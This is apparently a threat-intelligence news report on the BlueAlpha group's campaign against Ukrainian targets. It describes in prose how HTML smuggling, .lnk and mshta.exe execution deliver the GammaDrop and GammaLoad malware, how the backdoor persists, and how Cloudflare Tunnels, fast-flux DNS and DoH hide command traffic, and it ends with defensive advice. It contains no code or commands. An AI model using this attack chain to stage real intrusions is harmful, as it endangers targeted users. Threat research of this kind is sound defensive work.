Russian state-sponsored group BlueAlpha has been identified as actively targeting Ukrainian individuals and organizations through spearphishing emails containing malicious HTML attachments to deploy GammaLoad malware. To avoid detection, BlueAlpha has adopted the use of Cloudflare Tunnels to hide their infrastructure and have also implemented DNS fast-fluxing for their C2 servers. This ongoing campaign, which has been active since early 2024, demonstrates the persistent threat posed by Russian cyber actors.
Researchers have uncovered BlueAlpha’s exploitation of free Cloudflare Tunnels to disguise their GammaDrop malware staging infrastructure, utilizing randomly generated subdomains to serve as proxies to the actual server. This technique, attributed to its simplicity and cost-effectiveness, has gained traction among attackers. BlueAlpha employs tunnels to distribute GammaDrop malware via malicious .lnk files, reflecting a recent trend where attackers leverage Cloudflare Tunnels as a means to circumvent detection, similar to previous instances involving Remote Access Trojans (RATs) like AsyncRAT.
Having transitioned from using the onmousemove event to the onerror event within an img tag, attackers trigger the deobfuscation of malicious JavaScript in an XHTML attachment while also including a message signifying file download completion. The JavaScript, after checking the operating system, decodes an illicitly transported archive, downloads it, and retrieves a tracking pixel from a different location than the GammaDrop staging server, potentially exposing an IP address.
A malicious HTA file is downloaded and executed from the staging server using a shortcut file encrypted within the archive, utilizing the mshta.exe program. BlueAlpha utilizes GammaDrop, an obscured HTA payload, to deploy GammaLoad, a customized VBScript backdoor, wherein GammaDrop writes GammaLoad to the user profile directory and establishes persistence through a run key unless specific security software is active.
Furthermore, a blank Word document is initiated, and a C2 IP address is stored in a concealed file. Subsequently, GammaLoad transmits signals to the C2 server, sending victim data and fetching encoded VBScript for further malevolent activities. To avoid detection, various communication methods such as plain text HTTP, fast-flux DNS, and DNS over HTTPS (DoH) are employed.
According to the Insikt Group, in order to defend against HTML smuggling attacks embedding JavaScript, users should deploy email security solutions capable of scrutinizing and obstructing suspicious HTML events like “onerror” and “onmousemove.” Application control policies should limit the execution of “mshta.exe” and untrusted “.lnk” files, while endpoint detection must monitor “mshta.exe” operations for dubious command-line inputs.
Network traffic to TryCloudflare subdomains and unauthorized DoH connections should be closely monitored. Leveraging threat intelligence platforms to scrutinize dubious files, monitor real-time network activity for targeted assaults, and staying informed about attacker strategies and indicators of compromise are essential in thwarting such cyber threats.